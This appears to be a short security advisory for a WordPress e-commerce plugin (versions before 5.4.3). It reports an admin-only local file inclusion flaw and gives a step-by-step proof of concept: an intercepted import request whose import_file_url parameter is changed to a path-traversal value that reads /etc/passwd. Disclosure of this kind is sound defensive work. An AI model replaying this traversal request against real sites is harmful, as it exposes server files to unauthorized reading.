Shopping Cart & eCommerce Store < 5.4.3 - Admin+ LFI

The plugin does not validate HTTP requests, allowing authenticated users with admin privileges to perform LFI attacks.

PoC

1. Login as Admin. 2. Go to wp-admin/admin.php?page=wp-easycart-products&subpage;=products 3. Click on Import Products. Browse any file and click on import file. Intercept the request. It will contain the following: POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1 Cookie: wordpress_b92078c82d0f1044cdfb065e7ae28bec=admin%7C1675522971%; PHPSESSID=qp0lnu3uc71tv3hl6jcgsknnjd; wpeasycart_admin_perpage=25 action=ec_admin_ajax_import_products&import;_file_url=http%3A%2F%2F127.0.0.1%2Fwp-content%2Fuploads%2F2023%2F02%2Fresume_xss.png℘_easycart_nonce=fd850a701e 4. Change the value of import_file_url to a file (ex: /../../../../../etc/passwd) 5. Send the request and you will see that the contents of /etc/passwd is obtained Note: only first line is obtained in the response.